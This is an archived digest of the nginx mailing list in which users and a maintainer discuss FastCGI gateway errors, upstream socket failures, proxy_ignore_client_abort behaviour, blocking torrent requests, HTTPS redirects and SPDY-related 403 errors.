Hello Maxim, > > Like you suggested I have set "recursive_error_pages" to off but still I am > facing the problem. This time I am getting "504 Gateway Time-out" error. I > have already shared my NGINX and vhost configuration. We have one fastcgi > script running for serving error pages which checks the entry of > sample.xml(contains url) file and redirect the link to particular location. > If it doesn't find any page then it returns a 404 page. I am pasting the log > file of fastcgi script as well. The error is as clear as it could be: your backend failed to respond in time. As previously suggested, it may be due to the fact that it's overloaded. There are many options on how to fix this: - Improve your backend performance by optimizing the code. - Add more resources to the backend cluster (more processes on a single server and/or more servers). - Rethink your nginx configuration to avoid using the script (e.g., use nginx configuration to do redirects instead, this should be much more efficient). In either case, everything in your configuration seems to work correctly as configured. -- Maxim Dounin http://nginx.org/ From otyugh at gmail.com Tue Sep 2 12:43:24 2014 From: otyugh at gmail.com (Otyugh) Date: Tue, 2 Sep 2014 14:43:24 +0200 Subject: Nginw + FastCGIwrap = 502 bad gateway Message-ID: <20140902144324.4d871889@gmail.com> Greetings, I'm trying to get a C compiled program to work using fcgi with nginx, but I'm showed a 502 Bad Gateway. The actual setup is : all programs in ./cgi-bin/*.cgi should use fcgiwarp. The actual result is every adress matching report 502 Bad Gateway. I'm not sure of what I am missing :s >sudo service fcgiwrap status [ ok ] Checking status of FastCGI wrapper: fcgiwrap running. >sudo netstat -anp | grep cgi unix 2 [ ACC ] STREAM LISTENING 12743 4055/fcgiwrap /var/run/fcgiwrap.socket relevant extract of /etc/nginx/sites-available/blog location ~ ^/cgi-bin/.*\.cgi$ { # Disable gzip (it makes scripts feel slower since they have to complete # before getting gzipped) gzip off; # Set the root to /usr/lib (inside this location this means that we are # giving access to the files under /usr/lib/cgi-bin) root /usr/lib; # Fastcgi socket fastcgi_pass unix:/var/run/fcgiwrap.socket; # Fastcgi parameters, include the standard ones include /etc/nginx/fastcgi_params; # Adjust non standard parameters (SCRIPT_FILENAME) fastcgi_param SCRIPT_FILENAME /usr/lib$fastcgi_script_name; } >tail -n 2 /var/log/nginx/error.log 2014/09/02 14:28:16 [error] 4324#0: *13 upstream prematurely closed FastCGI stdout while reading response header from upstream, client: 127.0.0.1, server: notyugh.pwnz.org, request: "GET /cgi-bin/helloworld.cgi HTTP/1.1", upstream: "fastcgi://unix:/var/run/fcgiwrap.socket:", host: "localhost" 2014/09/02 14:28:27 [error] 4324#0: *13 upstream prematurely closed FastCGI stdout while reading response header from upstream, client: 127.0.0.1, server: notyugh.pwnz.org, request: "GET /cgi-bin/FILEDONTEXIST.cgi HTTP/1.1", upstream: "fastcgi://unix:/var/run/fcgiwrap.socket:", host: "localhost" More info : > nginx -V nginx version: nginx/1.2.1 TLS SNI support enabled configure arguments: --prefix=/etc/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-log-path=/var/log/nginx/access.log --http-proxy-temp-path=/var/lib/nginx/proxy --lock-path=/var/lock/nginx.lock --pid-path=/var/run/nginx.pid --with-pcre-jit --with-http_gzip_static_module --with-http_ssl_module --with-ipv6 --without-http_browser_module --without-http_geo_module --without-http_limit_req_module --without-http_limit_zone_module --without-http_memcached_module --without-http_referer_module --without-http_scgi_module --without-http_split_clients_module --with-http_stub_status_module --without-http_ssi_module --without-http_userid_module --without-http_uwsgi_module --add-module=/build/nginx-n55HQd/nginx-1.2.1/debian/modules/nginx-echo > dpkg -l | grep cgi ii fcgiwrap 1.0.3-3 armhf simple server to run CGI applications over FastCGI ii libfcgi0ldbl 2.4.0-8.1 armhf Shared library of FastCGI ii php5-cgi 5.4.4-14+deb7u14 armhf server-side, HTML-embedded scripting language (CGI binary) ii spawn-fcgi 1.6.3-1 armhf A fastcgi process spawner > uname -a Linux armServ 3.4.67+ #1 SMP PREEMPT Tue Dec 17 20:45:43 CET 2013 armv7l GNU/Linux From jon.clayton at rackspace.com Tue Sep 2 16:00:10 2014 From: jon.clayton at rackspace.com (Jon Clayton) Date: Tue, 2 Sep 2014 11:00:10 -0500 Subject: Socket connection failures on 1.6.1~precise Message-ID: <5405E98A.2070105@rackspace.com> I'm trying to track down an issue that is being presented only when I run nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not display this issue, but freshly created servers are getting floods of these socket connection issues a couple times a day. /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily unavailable) while connecting to upstream/ The setup I'm working with is nginx proxying requests to a unicorn socket powered by a ruby app. As stated above, the error is NOT present on nodes running 1.6.0-1~precise, but any newly created node gets the newer 1.6.1-1~precise package installed and will inevitably have that error. All settings from nodes running 1.6.0 appear to be the same as newly created nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn settings. All package versions are the same except for nginx. When I downgraded one of the newly created nodes to nginx 1.6.0 using the nginx ppa (ref: https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not present. Is there any advice, direction, or similar issue experienced that someone else might be able to help me track this down? -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 2 16:29:06 2014 From: nginx-forum at nginx.us (double) Date: Tue, 02 Sep 2014 12:29:06 -0400 Subject: proxy of "real_ip" Message-ID: <07761306b156355bfbda24826f969e27.NginxMailingListEnglish@forum.nginx.org> Hello, Is there a variable which stores the IP address of the proxy if I use the real-ip module. E.g. to log the client-ip as well as the proxy-ip (the IP address of the physical connection). Thanks a lot! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253024,253024#msg-253024 From neutrino8 at gmail.com Tue Sep 2 16:38:29 2014 From: neutrino8 at gmail.com (Grozdan) Date: Tue, 2 Sep 2014 18:38:29 +0200 Subject: Deny certain words In-Reply-To: <20140902130955.GJ1849@mdounin.ru> References: <20140902130955.GJ1849@mdounin.ru> Message-ID: On Tue, Sep 2, 2014 at 3:09 PM, Maxim Dounin wrote: > Hello! > > On Tue, Sep 02, 2014 at 12:17:12PM +0100, Steve Wilson wrote: > >> Torrent clients have their own user agent normally, I had a need a while >> back to block some which we used the magic 444 to kill it. >> >> if ($http_user_agent ~* (uTorrent|Transmission) ) { >> return 444; >> break; >> } > > Just a note: you don't need "break" here. > > -- > Maxim Dounin > http://nginx.org/ Hi, As reported, the above code returns 444 on torrent clients trying to connect. However, my access logs get filled with nginx sending a 444 response to clients. Is there a way to filter this? I'm currently using grep -v 'info_hash' to filter but it'll be better if nginx can do this instead. Thanks > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Yours truly From nginx-forum at nginx.us Tue Sep 2 16:57:15 2014 From: nginx-forum at nginx.us (shmulik) Date: Tue, 02 Sep 2014 12:57:15 -0400 Subject: Understanding "proxy_ignore_client_abort" functionality Message-ID: Hi, I'm trying to understand how "proxy_ignore_client_abort" should affect connection to upstream server once client closes the connection, since it seems to behave different than i'm expecting. I'm using the proxy module, with buffering on and proxy_ignore_client_abort on as well (proxy_store off). For boring and not related reasons, once i start a connection to the upstream server i don't want to abort it, even if the client aborted the connection. However, even with "proxy_ignore_client_abort" on, once the client closes the connection i still see that the upstream connection is closed by nginx. I've run the scenario with a debugger and i see why this happens. This is the flow: 1. At first, in "ngx_http_upstream_init_request", if "proxy_ignore_client_abort" is on, nginx will not check for FIN/RST from client: //------------------------------------------------------------------------------------------------- if (!u->store && !r->post_action && !u->conf->ignore_client_abort) { r->read_event_handler = ngx_http_upstream_rd_check_broken_connection; r->write_event_handler = ngx_http_upstream_wr_check_broken_connection; } //------------------------------------------------------------------------------------------------- 2. Later on, when reading the body from upstream and writing to downstream, if client closed the connection the flag "p->downstream_error" is set to 1. 3. And the part that surprised me - in "ngx_http_upstream_process_request", if "downstream_error" flag is set, we also close the connection to upstream, regardless of the "proxy_ignore_client_abort" config: //------------------------------------------------------------------------------------------------- if (p->downstream_error) { ngx_log_debug0(NGX_LOG_DEBUG_HTTP, r->connection->log, 0, "http upstream downstream error"); if (!u->cacheable && !u->store && u->peer.connection) { ngx_http_upstream_finalize_request(r, u, NGX_ERROR); } } //------------------------------------------------------------------------------------------------- I'd expect the "proxy_ignore_client_abort" flag to be checked in the "if" in #3 as well (=don't close upstream connection if the flag is true). My first thought was that if the file should not be stored or cached - there is no reason to continue the connection to upstream, so that this is by design. However if that's the case then proxy_ignore_client_abort is redundant. Can you please shed some light on this? is this a bug? is it the desired behavior? (if so, please explain the reason behind it). I'm using Nginx ver 1.4.1 (though if i didn't miss anything it should be the same in the latest version). My location config (simplified) is: location ~ "^/fetch/(.*)" { proxy_pass http://$1; proxy_buffering on; proxy_buffers 10 1024k; proxy_ignore_client_abort on; proxy_max_temp_file_size 0; proxy_http_version 1.1; } Thanks in advance, Shmulik B Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253026,253026#msg-253026 From mdounin at mdounin.ru Tue Sep 2 19:14:48 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:14:48 +0400 Subject: Socket connection failures on 1.6.1~precise In-Reply-To: <5405E98A.2070105@rackspace.com> References: <5405E98A.2070105@rackspace.com> Message-ID: <20140902191448.GP1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 11:00:10AM -0500, Jon Clayton wrote: > I'm trying to track down an issue that is being presented only when I run > nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not > display this issue, but freshly created servers are getting floods of these > socket connection issues a couple times a day. > > /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily > unavailable) while connecting to upstream/ > > The setup I'm working with is nginx proxying requests to a unicorn socket > powered by a ruby app. As stated above, the error is NOT present on nodes > running 1.6.0-1~precise, but any newly created node gets the newer > 1.6.1-1~precise package installed and will inevitably have that error. > > All settings from nodes running 1.6.0 appear to be the same as newly created > nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn > settings. All package versions are the same except for nginx. When I > downgraded one of the newly created nodes to nginx 1.6.0 using the nginx ppa > (ref: > https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not > present. > > Is there any advice, direction, or similar issue experienced that someone > else might be able to help me track this down? Just some information: - In nginx itself, the difference between 1.6.0 and 1.6.1 is fairy minimal. The only change affecting http is one code line added in the 400 Bad Request handling code (see http://hg.nginx.org/nginx/rev/b8188afb3bbb). - The message suggests that backend's backlog is full. This can easily happen on load spikes and/or if a backend is overloaded, and usually unrelated to the nginx itself. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 19:19:14 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:19:14 +0400 Subject: proxy of "real_ip" In-Reply-To: <07761306b156355bfbda24826f969e27.NginxMailingListEnglish@forum.nginx.org> References: <07761306b156355bfbda24826f969e27.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140902191913.GQ1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 12:29:06PM -0400, double wrote: > Hello, > Is there a variable which stores the IP address of the proxy if I use the > real-ip module. > E.g. to log the client-ip as well as the proxy-ip (the IP address of the > physical connection). > Thanks a lot! No. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 19:42:48 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:42:48 +0400 Subject: Understanding "proxy_ignore_client_abort" functionality In-Reply-To: References: Message-ID: <20140902194247.GR1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 12:57:15PM -0400, shmulik wrote: > Hi, > I'm trying to understand how "proxy_ignore_client_abort" should affect > connection to upstream server once client closes the connection, since it > seems to behave different than i'm expecting. [...] > 3. And the part that surprised me - in "ngx_http_upstream_process_request", > if "downstream_error" flag is set, we also close the connection to upstream, > regardless of the "proxy_ignore_client_abort" config: > > //------------------------------------------------------------------------------------------------- > if (p->downstream_error) { > ngx_log_debug0(NGX_LOG_DEBUG_HTTP, r->connection->log, 0, > "http upstream downstream error"); > > if (!u->cacheable && !u->store && u->peer.connection) { > ngx_http_upstream_finalize_request(r, u, NGX_ERROR); > } > } > //------------------------------------------------------------------------------------------------- > > I'd expect the "proxy_ignore_client_abort" flag to be checked in the "if" in > #3 as well (=don't close upstream connection if the flag is true). > > My first thought was that if the file should not be stored or cached - there > is no reason to continue the connection to upstream, so that this is by > design. However if that's the case then proxy_ignore_client_abort is > redundant. The proxy_ignore_client_abort flag specifies whether nginx will monitor possible connection close while waiting for an upstream server response. If an error occurs while sending a response, the connection will be closed regardless of the flag, much like if there where no nginx at all. Switching proxy_ignore_client_abort to on may be needed in the following cases I'm aware of: - you need to maintain compatibility with clients that half-close connections after sending a request; - your backend doesn't check if a connection is closed while generating a response (and hence closing the connection by nginx will not abort the request processing on the backend), and at the same time you want nginx to maintain limit_conn numbers mostly matching actual resources used on the backend; - your backend does check if a connection is closed, but you don't want this to happen as you code can't really cope with it. -- Maxim Dounin http://nginx.org/ From aleemb at gmail.com Tue Sep 2 19:50:27 2014 From: aleemb at gmail.com (Aleem B) Date: Wed, 3 Sep 2014 00:50:27 +0500 Subject: Get Selected backend info Message-ID: Hello, I couldn't find much information other than this thread which is a dead-end. I would like to add the selected backend/upstream to an "X-Backend" header before dispatching the request to the backend. In Varnish I can do this via: set req.http.X-Backend = req.backend In HAProxy I can do this via: http-send-name-header X-Backend However, I am stumped with Nginx. I imagine I could work around it by redirecting to the same server or some other trickery (not sure if that's a reasonable approach--what would the config look like in any case here?). Any other tips or suggestion are welcome. Thanks, Aleem -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Sep 2 19:55:32 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:55:32 +0400 Subject: Get Selected backend info In-Reply-To: References: Message-ID: <20140902195532.GS1849@mdounin.ru> Hello! On Wed, Sep 03, 2014 at 12:50:27AM +0500, Aleem B wrote: > Hello, > > I couldn't find much information other than this thread > which > is a dead-end. > > I would like to add the selected backend/upstream to an "X-Backend" header > before dispatching the request to the backend. You can't. The request is created _before_ the backend server will be selected (and the same request may be sent to more than one backend server due to proxy_next_upstream). -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Tue Sep 2 20:04:40 2014 From: nginx-forum at nginx.us (shmulik) Date: Tue, 02 Sep 2014 16:04:40 -0400 Subject: Understanding "proxy_ignore_client_abort" functionality In-Reply-To: <20140902194247.GR1849@mdounin.ru> References: <20140902194247.GR1849@mdounin.ru> Message-ID: <69bcb8699d67a6731a8231068e0f9e36.NginxMailingListEnglish@forum.nginx.org> Thank you very much for the clarification. So if i understand correctly, the only way to achieve my original goal, without modifying the code is to use "proxy_store" - which is actually for saving the content to disk, but as a side effect will keep the connection to upstream going even if the client closed it. Is there another alternative i'm missing? Thanks, Shmulik B Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253026,253032#msg-253032 From jon.clayton at rackspace.com Tue Sep 2 20:35:03 2014 From: jon.clayton at rackspace.com (Jon Clayton) Date: Tue, 2 Sep 2014 15:35:03 -0500 Subject: Socket connection failures on 1.6.1~precise In-Reply-To: <20140902191448.GP1849@mdounin.ru> References: <5405E98A.2070105@rackspace.com> <20140902191448.GP1849@mdounin.ru> Message-ID: <540629F7.6050004@rackspace.com> I did see the changelog hadn't noted many changes and running a diff of the versions shows what you mentioned regarding the 400 bad request handling code. I'm not necessarily stating that nginx is the problem, but it would seem like something had changed enough to cause the backend's backlog to fill more rapidly. That could be a completely bogus statement as I've been attempting to find a way to track down exactly what backlog is being filled, but my test of downgrading nginx back to 1.6.0 from the nginx ppa seemed to also point at a change in nginx causing the issue since the errors did not persist after downgrading. It's very possible that I'm barking up the wrong tree, but the fact that only changing nginx versions back down to 1.6.0 from 1.6.1 eliminated the errors seems suspicious. I'll keep digging, but I'm open to any other suggestions. On 09/02/2014 02:14 PM, Maxim Dounin wrote: > Hello! > > On Tue, Sep 02, 2014 at 11:00:10AM -0500, Jon Clayton wrote: > >> I'm trying to track down an issue that is being presented only when I run >> nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not >> display this issue, but freshly created servers are getting floods of these >> socket connection issues a couple times a day. >> >> /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily >> unavailable) while connecting to upstream/ >> >> The setup I'm working with is nginx proxying requests to a unicorn socket >> powered by a ruby app. As stated above, the error is NOT present on nodes >> running 1.6.0-1~precise, but any newly created node gets the newer >> 1.6.1-1~precise package installed and will inevitably have that error. >> >> All settings from nodes running 1.6.0 appear to be the same as newly created >> nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn >> settings. All package versions are the same except for nginx. When I >> downgraded one of the newly created nodes to nginx 1.6.0 using the nginx ppa >> (ref: >> https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not >> present. >> >> Is there any advice, direction, or similar issue experienced that someone >> else might be able to help me track this down? > Just some information: > > - In nginx itself, the difference between 1.6.0 and 1.6.1 is fairy > minimal. The only change affecting http is one code line added > in the 400 Bad Request handling code > (see http://hg.nginx.org/nginx/rev/b8188afb3bbb). > > - The message suggests that backend's backlog is full. This can > easily happen on load spikes and/or if a backend is overloaded, > and usually unrelated to the nginx itself. > From nginx-forum at nginx.us Tue Sep 2 22:47:58 2014 From: nginx-forum at nginx.us (itpp2012) Date: Tue, 02 Sep 2014 18:47:58 -0400 Subject: Transforming nginx for Windows In-Reply-To: <7bb5e1c41a64ef81e91fdc361619bed3.NginxMailingListEnglish@forum.nginx.org> References: <7bb5e1c41a64ef81e91fdc361619bed3.NginxMailingListEnglish@forum.nginx.org> Message-ID: nginx for Windows, one year on? Time flies when you?re having fun :) one year down the road transforming nginx, rewriting, re-developing, crashing, heavy battles with compilers, add-on?s, c++ restrictions, ngxLuaDB powered by nginx for Windows, cross compiler, multi node imports? and yet here we are today September 2, 2014 ! A huge thanks to our team for their relentlessness in getting problems solved, to agentzh for fixing VC issues, to nginx.inc developers for their fast fixes in the base version, to the beta testers for being daring :) and everyone else for your support. Which mayor items are next? - More non-blocking Lua, event based DLL add-on?s like pagespeed, SharePoint, asp/dotnet. - Tcp proxy support. - Full 64 bit builds. - IO event and thread separation. - Distributed IO and CPU event processing. To date 18k+ independent downloads. 1200+ running in production. We ain?t done yet, we?re here to stay. Builds can be found here: http://nginx-win.ecsds.eu/ Follow releases https://twitter.com/nginx4Windows Posted at Nginx Forum: http://forum.nginx.org/read.php?2,242426,253034#msg-253034 From nginx-forum at nginx.us Wed Sep 3 07:53:03 2014 From: nginx-forum at nginx.us (manish-ezest) Date: Wed, 03 Sep 2014 03:53:03 -0400 Subject: NGINX redirection issue In-Reply-To: <20140902135850.GL1849@mdounin.ru> References: <20140902135850.GL1849@mdounin.ru> Message-ID: OK thanks Maxim. I will check your recommendation and will let you know. --Manish Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252379,253036#msg-253036 From dewanggaba at xtremenitro.org Wed Sep 3 11:05:19 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Wed, 03 Sep 2014 18:05:19 +0700 Subject: Reverse proxy didn't redirect http protocol Message-ID: <5406F5EF.104@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, I have a page contains 'http://' assets, and I do redirect on my nginx like this : - -------- BEGIN CONFIGURATION -------- server { listen 80; server_name subdomain.domain.com; return 301 https://$http_host$request_uri$is_args$query_string; } server { listen 443 ssl spdy; server_name subdomain.domain.com; location / { proxy_pass http://127.0.0.1:8080; } ssl on; ssl_certificate /etc/nginx/certs/star-domain.com-bundle.crt; ssl_certificate_key /etc/nginx/certs/star-domain.com.key; ssl_verify_depth 2; location ~* ^.+\.(jpg|jpeg|gif|png|css|js|ico)$ { root /home/kincirplay/public_html; expires 1y; add_header Link "<$scheme://$http_host$request_uri>; rel=\"prefetch\""; } } - -------- END CONFIGURATION -------- Here is my proxy.conf and ssl.conf configuration (stored on conf.d directory). proxy.conf http://ur1.ca/i45bu ssl.conf http://ur1.ca/i45bx Can I do redirect my http assets (without change the code) using this configuration? If can't, is it possible? If possible, I need your help to reconfigure the configuration. Thanks in advance :) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUBvXuAAoJEEyntV5BtO+QjRMIAKa4YI/AEdOoJzRGIKUOun++ BbyuNKDH91vo3NJP8Q7CMkbFvPwLpbzy3HfZnUcXRObz9mS1D8KSpoIw2c67XhSh HjaBfcnlSPVwLm5bSyr3xbPi8rJHgxj8fDgQUGmPc9kqIwjPgGIyaOqS5qQ5C7fS uzsA8AL4/sm7yKFqULLHpMUqjz595GbMah9HQJCAZ8BQsYaTQ0CQB4khXdRSpQ/b XABBTknkQjJ4MO0NhEwAEu6aFeKJq2u3HJoaB58Vx/7pUifhXJKPAQl8TgbLMuSR qLC8gkFVJhK9cA4+pieMa3A6tUgt3WREZq3n9nP357DEVqw9PuoYZFbe09icYlk= =UzEE -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x41B4EF90.asc Type: application/pgp-keys Size: 1743 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x41B4EF90.asc.sig Type: application/pgp-signature Size: 287 bytes Desc: not available URL: From nginx-forum at nginx.us Wed Sep 3 14:10:01 2014 From: nginx-forum at nginx.us (erankor2) Date: Wed, 03 Sep 2014 10:10:01 -0400 Subject: terminate a connection after sending headers In-Reply-To: <20140902130903.GI1849@mdounin.ru> References: <20140902130903.GI1849@mdounin.ru> Message-ID: Maxim, thank you very much for your response. To clarify - the problem is not about freeing the request (I don't think there's a resource leak here), the problem is that the connection is just left hanging until the client closes it / the server is restarted. It is true that write_event_handler gets initialized to zero when the request is allocated, but it is set to ngx_http_request_empty_handler before the first line of my code even runs. In ngx_http_core_content_phase there's: if (r->content_handler) { r->write_event_handler = ngx_http_request_empty_handler; ngx_http_finalize_request(r, r->content_handler(r)); return NGX_OK; } where r->content_handler is the entry point to my code. So, unless I explicitly reset it back to NULL (something that I never saw in any other nginx module) write_event_handler will not be null and the connection will be left hanging. I forked some sample hello world module and modified it to reproduce the problem, please check it out here: https://github.com/erankor/nginx-hello-world-module/blob/master/ngx_http_hello_world_module.c In that code, I'm sending the response headers and then trigger a timer for 1 second. In the timer callback I close the request with NGX_ERROR, but the connection remains active (I used a timer here since that's the easiest solution to defer the execution, in my real project I'm performing asynchronous file I/O) Thank you ! Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253040#msg-253040 From lists-nginx at swsystem.co.uk Wed Sep 3 14:33:48 2014 From: lists-nginx at swsystem.co.uk (Steve Wilson) Date: Wed, 03 Sep 2014 15:33:48 +0100 Subject: Deny certain words In-Reply-To: References: <20140902130955.GJ1849@mdounin.ru> Message-ID: On 02/09/2014 17:38, Grozdan wrote: > On Tue, Sep 2, 2014 at 3:09 PM, Maxim Dounin > wrote: >> Hello! >> >> On Tue, Sep 02, 2014 at 12:17:12PM +0100, Steve Wilson wrote: >> >>> Torrent clients have their own user agent normally, I had a need a >>> while >>> back to block some which we used the magic 444 to kill it. >>> >>> if ($http_user_agent ~* (uTorrent|Transmission) ) { >>> return 444; >>> break; >>> } >> >> Just a note: you don't need "break" here. >> >> -- >> Maxim Dounin >> http://nginx.org/ > > Hi, > > As reported, the above code returns 444 on torrent clients trying to > connect. However, my access logs get filled with nginx sending a 444 > response to clients. Is there a way to filter this? I'm currently > using grep -v 'info_hash' to filter but it'll be better if nginx can > do this instead. > > Thanks You could try; access_log off; Steve. From lists-nginx at swsystem.co.uk Wed Sep 3 15:07:28 2014 From: lists-nginx at swsystem.co.uk (Steve Wilson) Date: Wed, 03 Sep 2014 16:07:28 +0100 Subject: Deny certain words In-Reply-To: References: Message-ID: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> I've just thought of another angle for this. Is this hitting your default/only site? If it's got a host header you could create a site just for that that bins all requests off with a 444 and no logging. On 02/09/2014 12:08, Grozdan wrote: > Hi, > > Somehow my server gets hit by torrent requests which look like this: > > GET /?info_hash=..... > > after the = come long strings of seemingly random hashes torrent > clients are looking for. > > I'd like to deny all such requests so would like if someone could > provide me how to deny everything (and including) ?info_hash= > > I've looked all over the net at similar examples but all I tried thus > far didn't work > > Thanks :) From neutrino8 at gmail.com Wed Sep 3 15:13:40 2014 From: neutrino8 at gmail.com (Grozdan) Date: Wed, 3 Sep 2014 17:13:40 +0200 Subject: Deny certain words In-Reply-To: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> References: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> Message-ID: On Wed, Sep 3, 2014 at 5:07 PM, Steve Wilson wrote: > I've just thought of another angle for this. Is this hitting your > default/only site? If it's got a host header you could create a site just > for that that bins all requests off with a 444 and no logging. Yes, it's the only site. I will try what you suggested. Thanks! > > > On 02/09/2014 12:08, Grozdan wrote: >> >> Hi, >> >> Somehow my server gets hit by torrent requests which look like this: >> >> GET /?info_hash=..... >> >> after the = come long strings of seemingly random hashes torrent >> clients are looking for. >> >> I'd like to deny all such requests so would like if someone could >> provide me how to deny everything (and including) ?info_hash= >> >> I've looked all over the net at similar examples but all I tried thus >> far didn't work >> >> Thanks :) > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Yours truly From neutrino8 at gmail.com Wed Sep 3 15:30:55 2014 From: neutrino8 at gmail.com (Grozdan) Date: Wed, 3 Sep 2014 17:30:55 +0200 Subject: Deny certain words In-Reply-To: References: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> Message-ID: On Wed, Sep 3, 2014 at 5:13 PM, Grozdan wrote: > On Wed, Sep 3, 2014 at 5:07 PM, Steve Wilson wrote: >> I've just thought of another angle for this. Is this hitting your >> default/only site? If it's got a host header you could create a site just >> for that that bins all requests off with a 444 and no logging. > > Yes, it's the only site. I will try what you suggested. Thanks! Well, just as I went and try what you suggested I came on the nginx docs where it says you can use 'map directive' to decide what to log or not so I tried the below and it works Below goes inside http { .... } map $status $loggable { ~^444 0; default 1; } and in the vhost inside server { .... } goes the below access_log /var/log/nginx/vhost.access.log combined if=$loggable; This completely ignores disables logging of 444 responses > >> >> >> On 02/09/2014 12:08, Grozdan wrote: >>> >>> Hi, >>> >>> Somehow my server gets hit by torrent requests which look like this: >>> >>> GET /?info_hash=..... >>> >>> after the = come long strings of seemingly random hashes torrent >>> clients are looking for. >>> >>> I'd like to deny all such requests so would like if someone could >>> provide me how to deny everything (and including) ?info_hash= >>> >>> I've looked all over the net at similar examples but all I tried thus >>> far didn't work >>> >>> Thanks :) >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > -- > Yours truly -- Yours truly From nginx-forum at nginx.us Wed Sep 3 18:08:50 2014 From: nginx-forum at nginx.us (robinpanicker) Date: Wed, 03 Sep 2014 14:08:50 -0400 Subject: URL encoding for nginx rewrites Message-ID: <3d5dd0cb4f07fb4fe2a3461ed606d378.NginxMailingListEnglish@forum.nginx.org> Hello everyone. I am using a rewrite similar to below location /home { rewrite ^/(.*) https://mysite.com/homepage/?next=/redirectionurl redirect; } The issue is that nginx is not encoding the URL before it redirects. So this is failing at the server that is receiving this request. Can someone help me in encoding the rewritten URL. Thanks a lot in advance Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253045,253045#msg-253045 From georg at riseup.net Wed Sep 3 18:18:50 2014 From: georg at riseup.net (georg) Date: Wed, 03 Sep 2014 20:18:50 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" Message-ID: <54075B8A.2070304@riseup.net> [Not sure if this is the right list, because I'm uncertain if the following is intended behaviour or a problem in nginx or the involved browsers. So would be happy if you guys could me give some advice and a pointer in case, this mail should better be directed elsewhere; if so, sorry for the noise.] [Iceweasel is the name of Firefox in Debian.] Hi all, I've got a server running a current Debian Wheezy and nginx 1.6.1-1~bpo70+1. Like this suggests, the packages (nginx-common and nginx-extras) are installed from wheezy-backports. This server got one private ip, the traffic to and from the public internet gets routed by haproxy on a different machine. I've tried out the spdy module to test how this changes page load times etc. On the webserver I'm hosting some static content, an etherpad and a dokuwiki. I've put the configuration for the dokuwiki vhost at [1]. This works just fine with Chromium 35.0.1916.153-1~deb7u1 (out of wheezy) and Iceweasel 24.8.0esr-1~deb7u1 (out of wheezy), no problems loged, neither in the browser, nor in the nginx logs. However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the browser console reads various 403 forbidden, and the nginx log is telling me the cause: "[...] 25108#0: *200 access forbidden by rule, client: XX.XX.XX.XX, server: wiki.example.com, request: "GET /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". I've got no clue how to debug this, to be honest. I didn't made any change, just upgrading one of the involved browsers. Could this be an incompatibility with this new Iceweasel version? Any ideas for this? And one more question: I've tried (because of these failures) to enable spdy just on some vhosts, but it seems, enabling spdy in one of these makes all vhosts using it. Is this correct? Could I circumvent this using two ips, one spdy enabled, and one spdy disabled? Thanks in advance, cheers, Georg P.S.: Nginx is awesome - thanks for your work! [1] http://pastebin.com/raw.php?i=BPynrmLg -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From vbart at nginx.com Wed Sep 3 20:23:32 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 04 Sep 2014 00:23:32 +0400 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <54075B8A.2070304@riseup.net> References: <54075B8A.2070304@riseup.net> Message-ID: <2869527.IvnDEkO7Be@vbart-laptop> On Wednesday 03 September 2014 20:18:50 georg wrote: [..] > However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the > browser console reads various 403 forbidden, and the nginx log is > telling me the cause: 